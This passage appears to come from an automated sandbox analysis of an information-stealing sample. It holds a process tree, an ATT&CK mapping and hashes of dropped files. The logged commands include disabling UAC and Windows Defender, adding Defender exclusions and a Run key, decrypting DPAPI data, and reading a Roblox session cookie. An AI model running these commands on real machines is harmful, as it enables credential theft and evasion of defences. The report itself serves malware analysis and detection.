      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,211,190,155,212,161,26,210,77,159,26,162,51,191,113,127,134,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,98,66,225,2,241,192,106,50,133,54,192,187,162,3,97,114,165,104,134,232,23,55,137,43,223,107,186,219,176,217,134,63,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,40,235,29,118,130,81,211,113,150,180,68,200,251,184,94,59,137,186,63,36,4,133,110,51,155,209,85,151,138,126,224,48,0,0,0,137,49,167,94,183,200,188,50,162,222,107,135,228,103,19,222,52,93,3,178,220,48,15,0,8,80,26,48,204,226,138,12,238,115,178,157,214,67,97,8,42,134,193,40,123,79,97,153,64,0,0,0,213,138,219,51,189,201,113,36,149,155,132,70,211,181,209,8,150,225,17,101,69,112,240,141,105,105,111,255,172,95,142,145,32,35,181,34,75,186,247,230,35,58,240,120,126,71,252,124,166,199,222,222,246,253,131,69,221,14,53,79,35,148,193,91), $null, 'CurrentUser')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1068
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:5212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    3⤵
    PID:5480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get serialnumber
      4⤵
      PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Node /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
    3⤵
    PID:6012
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Node /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
      4⤵
      Adds Run key to start application
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.C8RFohgFgJ""
    3⤵
    PID:5980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.C8RFohgFgJ"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
    3⤵
    PID:3352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    3⤵
    PID:3560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get serialnumber
      4⤵
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    3⤵
    PID:5984
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get serialnumber
      4⤵
      PID:2240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
    3⤵
    PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
    3⤵
    PID:3972
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_computersystemproduct get uuid
      4⤵
      PID:5528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
    3⤵
    PID:5432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Description,PNPDeviceID
      4⤵
      PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
    3⤵
    PID:240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic memorychip get serialnumber
      4⤵
      PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:4004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
    3⤵
    PID:4168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get processorid
      4⤵
      PID:960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
    3⤵
    PID:2120
  - - C:\Windows\system32\getmac.exe
      getmac /NH
      4⤵
      PID:5180
- - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
    C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5664
  - - C:\Windows\Temp\{2BA8A0DF-0D1B-44B9-8CC6-3402419310FA}\.cr\python-installer.exe
      "C:\Windows\Temp\{2BA8A0DF-0D1B-44B9-8CC6-3402419310FA}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=568 -burn.filehandle.self=544 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
    3⤵
    PID:3920
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5688
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5976
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    - Views/modifies file attributes
    PID:2952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3332
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2892
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4780
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4848
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5392
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\svchost.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3360
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5044

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:5204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e592d24.rbs

Filesize
8KB

MD5
00cdd340ab03e4cb33f8045f77ec037d

SHA1
ecb9f6e76d4376767e130092038a193882914996

SHA256
b08a85acb3ddc819fd4fb537ed45f8555ed074a77bac02b097c4ad889ad2fb38

SHA512
2931c4e3eae918f089df567c432be574b93fdab2e4b3c201e7911632cd87a6bdf00c11937694ebdccf72eae877e6da7fc6e2a7630ef3cff896ba2d3cd20a1bfe

Download Submit
C:\Config.Msi\e592d2c.rbs

Filesize
8KB

MD5
7cae2891f1f830493ff766a7af5b04e8

SHA1
c1d0e8943ce59c52974cdcd954c2f6602b586c08

SHA256
d0e2ef86e42765f2679610871f816d021cfeea49043d9cbce04d1a3b0d376081

SHA512
01a7ab62ce9404818aaf04705ad7eea6c5dd081e13c2e5786ada9c207f2d246e6a88ae5ce2c4df67e68c095e4bbe0bb4a74c16ec88ff551b35961a4ddf4138fd

Download Submit
C:\Config.Msi\e592d2d.rbf

Filesize
66KB

MD5
5eace36402143b0205635818363d8e57

SHA1
ae7b03251a0bac083dec3b1802b5ca9c10132b4c

SHA256
25a39e721c26e53bec292395d093211bba70465280acfa2059fa52957ec975b2

SHA512
7cb3619ea46fbaaf45abfa3d6f29e7a5522777980e0a9d2da021d6c68bcc380abe38e8004e1f31d817371fb3cdd5425d4bb115cb2dc0d40d59d111a2d98b21d4

Download Submit
C:\Config.Msi\e592d2e.rbf

Filesize
6.6MB

MD5
166cc2f997cba5fc011820e6b46e8ea7

SHA1
d6179213afea084f02566ea190202c752286ca1f

SHA256
c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546

SHA512
49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a766b59cb8764029e0daa42ff2d21c3f

SHA1
9ca2e4735a93ab8ddf2d8e6928f1c570aa4ff80b

SHA256
92d5a76ed593d1450f8f5309d806ef2ec37be8839f1e0e20763e75180345feac

SHA512
e92fe19a450bc93cfcbaed70586d580470d239cd41997e0bdebdb45f1b6ba02604b4e839ab6ee40d5112ba683c647ecd10751183ab2f89226994e17680c52eae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
4f5f260adddac5f80eb2d1c0784a2e24

SHA1
8719894ff1664202f9e228c55f94d62dcaf12cce

SHA256
7b41d9c769cb20c7ad73e7afa44f964fd7fe66be45d2b0a2ef438dc985433202

SHA512
aa4a23298fda2e7bd6168bcb25b4a215616bccf73705e3566b6b576bf33bb9336682ace3354643332c940c5ee02eef59682a77447ba2f94e97ae0b4722ef0ba7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
836B

MD5
88d28418616dc895a7818f8d3b978008

SHA1
2433c347c98066c43f7d2e6504a93b5099b048a8

SHA256
d226abb6564b4c16b4d25d7e9749029c04c361c0b52fdf0e0c20f92300ab02c3

SHA512
9af7ca32a27a751b5b6caab3c86a6cdd1fb2785ae017dadc4c150ebcb76e4876e1e7782c5b1f3d2dc4ae63896d5e42b4ab38e3266bad4ec66e8f257b5e69357b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f29ff8b1e0f396a194a6782749830b8e

SHA1
2f8999b0eb2a20e591cf9a638c9fa84ddf4a1f69

SHA256
5bfd4968395fefaac3941c08fa11e86dfde1072137d9290aee3888f2a5d92d3f

SHA512
0689d665f2a7c9007c5dc4c14a53d5566d315d05d476bee82d64d02d40e3ffddca2b36419c76a8f7b7979958a62a7a93c939d1ed72fa7a844841ed06741b9e19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d955e2eb49e6982f19d582cdbf67b3fc

SHA1
ed55848e14423e15e55ef868fc2c8d842f147584

SHA256
a5ece8f182287bab6082e4f558e2c19344ef51e38a1a4e321a2882d6e351ba5d

SHA512
bb91f8a106afc197ef416d08cb640c216bcc3ce02c51c33fff1244793f0757b277d1b10fad1fd8028757e48342c2463fe5848ce92c1303f6cf846d6984d018ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7c5128dc5ff96913e0074737d9a1f13e

SHA1
a07f2a71711be818ff254cac401557e80456be19

SHA256
cddd4666393eb54c99b0bfd0a97f4974a16d0759034524d0bcd08810033154c9

SHA512
ca254abe09e0a942bc2f82971d1e75165ea6dc34728db2815000dfbfe73f9e879857a58b2b216b7e68aea2725a5e20065b98acc571f81a8fc2bf7fadb7de613d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
89745846b74cce1c4e0ebff1d0231b4b

SHA1
64362d46d8ea8d24dd3749c8006376b73bfbe07f

SHA256
feae58a4e100cc3f2908df974cfb907a135e4ddaea7ad13d13668f2f38f1374b

SHA512
9aa60e441cc22a7f2ae95fd07e6633de4460ef554b5c71f9eed05ee9ce40b4655ed36d27f67f644a1dff6118e11a41d2dcb07d76c56efcab6514de570a61c1fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b32665acf7f1076f8a445276033d16bb

SHA1
28a383e43e37458e2c7b14618995a990838c3de2

SHA256
67d7ecf9a9d5b5eb94322b3c334a19bb6acc7121b05235bf7124d77833b9d706

SHA512
00bdde528eb5dd9ac61182d1748d2983459dd47b620237c4e2130e793c6abb2351fa8ec2da08e840c19cbcc3c28c163850678ab97b6234b5bf74eb4f32492ea6

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\.unverified\lib_JustForMe

Filesize
7.1MB

MD5
f6ddadd0d817ce569e202e57863ae919

SHA1
3a2f6d81c895f573464d378ab3bcfb6d8a48eaf2

SHA256
63032d6386c94e83a3b7b7b9eefc23493f976bd435a10668aa263d1ca1cb22e1

SHA512
7d970e62e3b513b2fa98e8a83ce3080fc6652bba2b70a5127a46ca5c2b0dee8790e48fffef56d15bec2706a997ade5a3c05ff5df4c6be2b3632b6bf7aa6e9ef2

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\.unverified\tcltk_JustForMe

Filesize
3.4MB

MD5
fd7e13f2c36fe528afc7a05892b34695

SHA1
14a9c4dfd12e1f9b1e64e110166500be1ef0abb1

SHA256
2a24729e58bce7c2abde7225dc2de32539b4c4ef3609b53b54f643955d01c4b0

SHA512
7b7060672f680c418f7ebbddf2ba693539b1284566ab756c8061b61a582d13537aa215dad03db5c803eeba2f6fcc7fad7ed2857931ea205048abd905afef1d4f

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\{537B2AF5-504B-4303-99CB-FDE56F47AA51}v3.12.6150.0\exe.msi

Filesize
724KB

MD5
2db9e147e0fd938c6d3c1e7cf6942496

SHA1
e4333f4334b5df6f88958e03ad18b54e64a1331f

SHA256
9f3fc998d3ef429818a8047a43aad89f2d88c190385ba5ac57124132acda9eab

SHA512
4b9cbbf2d26cab8be365671d91c7f95216e90a9de30b87224228d1ab5db64a888fbf0b552d259dc5552d2da28451a394c227da312c73807a9c69fe6edfa3cbc8

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\{901B913C-FA63-48D2-9842-7D7676739378}v3.12.6150.0\core.msi

Filesize
1.9MB

MD5
d4c1f834f30032f220409a17e0f688cd

SHA1
61dc90b164c3797456a8ed775b353a087054fd0f

SHA256
675c023e78eaed980638a969feaaa07c52a5a604d89e81434e6c462f17eebc12

SHA512
b7e97a5fab185b5d9150e07e1707aca21285ae62d4a25997040349eab78a2ad2f9a555980bb221a3a91120651c04a5df0909387e8931e76094de41f7697b124f

Download Submit
C:\Users\Admin\AppData\Local\Temp\JUPsc5snLH.ps1

Filesize
380B

MD5
cbb9a56c9c8d7c3494b508934ace0b98

SHA1
e76539db673cc1751864166494d4d3d1761cb117

SHA256
027703af742d779f4dcde399ac49a3334f1b9e51b199215203e1f4b5e3251fe5

SHA512
f71e0a521c2b0aa034e0a2c9f0efd7d813d8408d118979f8e05ecd3aa6fb94c67793e2302ed9455aad9a63d43a53fa1ac2b3d45f7bdfa1cc8104c9a9ace84129

Download Submit
C:\Users\Admin\AppData\Local\Temp\Node.exe

Filesize
37.2MB

MD5
0596379d69afdfe2534fad7584914d1f

SHA1
34cafd2ac2fb94c4981ef903c974e0f463d0a0e8

SHA256
6ae88823ed9ebb76bd63babd61b7dfe6ac9168b2284f32f4b657ebe448b742ca

SHA512
17d8ab7db5186d3c77e5ff949bd63bd7b5a31a3891cb757340465ad1df308917c939305218b5448db9f109a61702eb054d6182eecdcba1ba2eb268a10568b932

Download Submit
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250114211937_000_core_JustForMe.log

Filesize
3KB

MD5
137830e2b25f29c4ebfbe8b5816ef3a6

SHA1
54f94ac04c19a80be18b79e89a1e701af448f0e2

SHA256
55203d796adea04066a32e4664d72ce4412685d002db66210a5df6e57a054f4b

SHA512
14482a4bddf187547a5fa4ade5f3cde8499d6fc19366aa346ff59511184fa16ab028e07a746be51cfae543aafcd04c00cb0d24d8ed694457b4495272e4c637f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250114211937_000_core_JustForMe_rollback.log

Filesize
1KB

MD5
dae8d07bb04f2b67f6bb735f6ff5ef67

SHA1
82754ee6da19374db3d9ef6e75112e8998588d28

SHA256
57ec72df3854c2ac8772f3c85c2ca52900a4f4b569ebb1dc1a3eae76b66ccb37

SHA512
f3dfd837b12d3ba3b43465d43e731327cd047e3903a877136372e980e02030890b25d9eb94cb2a3538754b2829b3f347690029fa41bb4e505958eb59a9a1f0a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250114211937_001_exe_JustForMe.log

Filesize
1KB

MD5
b2ac6505058614d9c386172a99dba5b8

SHA1
9951e706eb3c3285613478e6a1b7c4c43f44eb57

SHA256
6d5b0b4b508c133e51bc90d32d5b3edb463db99538079729a45930efe1f418bb

SHA512
df34dbe9fc2bde423135c8812e02cc2c6ed598755b224ab712d2dcb4d315ddb4bdf0cdbdcb899c698e5b5d06f1b848ebf8bb6bf72ce7f7d16ac9d9aa3620437c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8944.tmp

Filesize
1KB

MD5
5cff5e7210d48c603ffcbdddf76c6882

SHA1
b5c7c34dded42541b1fae4261d2acac854df8fbe

SHA256
00db78fe5acdb352054d4a8487437788f66780c4dffd9076acb6f4db42796b64

SHA512
0d6382af69f1ff567da81e77c86fa915558bc0580d85ab71f79234c2b7f3aa4f12bcbafda9ed16892b1ef411db337efbb76ddc913a97adeab2b55745bc106663

Download Submit
C:\Users\Admin\AppData\Local\Temp\TestingServer.exe

Filesize
3.7MB

MD5
54980c00c99dd31da947a704034250e4

SHA1
0388dcb527b4df85048593fb1fe324461ac2539b

SHA256
efe6e5da039480336cc51d61970eb7ca5b0c10bc315c083f3cd08f81fb5fa7e6

SHA512
3e2202658a8a44d994a34dfa5ae2b7de4d539713424f6e9047401847e003df6daf06848c405584e2c0ac7f80c421d708caf0b82f6995e720060a2662c18fd20c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zs2lpfa2.dsr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\n2u1p2vk\n2u1p2vk.dll

Filesize
3KB

MD5
c8713dafe7deec2878c144f05e98664a

SHA1
0a7469e6409cfdf328758dc20027d17cfc4c6cb2

SHA256
f681f98015015d63d104dff6c5d987c0b74d729713577765973c77ac47b19a96

SHA512
9a704cb3484e911c615d6232ed025969485a8c7f1207259c22784ac8e25dd074cefb7e3fbb80dacd94b44cf4652d1e3dbc2a9238e041d0051ba9475de2039a98

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\python-installer.exe

Filesize
25.3MB

MD5
d8548aa7609a762ba66f62eeb2ca862d

SHA1
2eb85b73cab52693d3a27446b7de1c300cc05655

SHA256
5914748e6580e70bedeb7c537a0832b3071de9e09a2e4e7e3d28060616045e0a

SHA512
37fa7250b10b0c03b87d800bf4f920589649309cb4fbd25864475084bb7873d62b809a4fdeabd06c79f03f33614218eb7e01a9bd796de29dd3b141f1906d588c

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
229KB

MD5
74a87327b20292e3a514a2edd1f91c2c

SHA1
d4a38972946d2a8ce32d375b4781e2f09ecc5368

SHA256
7d3e8efdb9cc50120a910f17ed69a6edafd03a6d8ef2765f07e974bab5d6c7a2

SHA512
effa857d12d0d955504013525aab1f75bd0e48e958e82b4822ecaab3333176b80c4a107934a11525b791f77f4126cc5db863f841c6cb6c3db3ea679514cb4eec

Download Submit
C:\Windows\Temp\{2BA8A0DF-0D1B-44B9-8CC6-3402419310FA}\.cr\python-installer.exe

Filesize
858KB

MD5
931227a65a32cebf1c10a99655ad7bbd

SHA1
1b874fdef892a2af2501e1aaea3fcafb4b4b00c6

SHA256
1dcf770dc47264f7495a559f786a4428f3a97f9d81e4c466ec9a5636f5a1be6d

SHA512
0212b5adc6ee8893edf4b94272fdffe145f53fe31357a3e024543f434cdc022a915d76780c1103aa9948feca5f161cfae608f91f3c7a876569e91c05d690d507

Download Submit
C:\Windows\Temp\{883E8D5B-0F69-4A32-979D-69C176174C2B}\.ba\PythonBA.dll

Filesize
675KB

MD5
8c8e5a5ca0483abdc6ad6ef22c73b5d2

SHA1
9b7345ab1b60bb3fb37c9dc7f331155b4441e4dc

SHA256
edc6db3712eb4e1cd6988bc7b42c467ac6901148f3ee4bdfb286eff26efbfd43

SHA512
861ad726872b58e5b8b7c580b485e7bde0be6c1963ac23db63d4105684d1e50e8f409cd329f183d252a52e2be2737efaf9e4413eff29deee75b87850664b3157

Download Submit
C:\Windows\Temp\{883E8D5B-0F69-4A32-979D-69C176174C2B}\.ba\SideBar.png

Filesize
50KB

MD5
888eb713a0095756252058c9727e088a

SHA1
c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4

SHA256
79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067

SHA512
7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0

Download Submit
C:\Windows\Temp\{883E8D5B-0F69-4A32-979D-69C176174C2B}\pip_JustForMe

Filesize
268KB

MD5
494f112096b61cb01810df0e419fb93c

SHA1
295c32c8e1654810c4807e42ba2438c8da39756a

SHA256
2a1f085a0ad75d5b332fb0fe9e1a40146c311e8e524e898a09ca40157619fa80

SHA512
9c8ec8fcc5d74b5022cd170677b62dfedbc187fde1dd296bdb9733bec03e18674a385928c8827a4ce1864433d50e8598228a6d2198aef2937c0dcc0d8f4ea704

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n2u1p2vk\CSC2CD7898B3A144A5C83FD42FDF67915C1.TMP

Filesize
652B

MD5
91a02a031d846c209481ea9c08538fdb

SHA1
1a358017d0654819286ac1833f230e1ee06fac9e

SHA256
809066e1a02521ad9327f8b181e35f2352b57be02a35d1cd332f2a667c5a1ac5

SHA512
e6b4513518a14f1291a103a09d11a9344effdad706bd931052a97c5f9e8ed5b34612960c661fddce2c274907454ea5c19a56c4095ac2913f95b357f226859187

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n2u1p2vk\n2u1p2vk.0.cs

Filesize
312B

MD5
ecbf151f81ff98f7dff196304a40239e

SHA1
ccf6b97b6f8276656b042d64f0595963fe9ec79c

SHA256
295ca195631c485c876e7c468ddcbb3fe7cd219d3e5005a2441be2de54e62ac8

SHA512
4526a59055a18af6c0c13fb9f55a9a9bc15aa1407b697849e19b6cc32c88ee7206b3efff806bd154d36bce144ae1d9c407c6ea0f5077c54fbe92cd172c203720

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n2u1p2vk\n2u1p2vk.cmdline

Filesize
369B

MD5
e01dc61ea9dbb45e45a38aab557ca142

SHA1
9725df5698628d3bca0e385ed5e0e18ede235226

SHA256
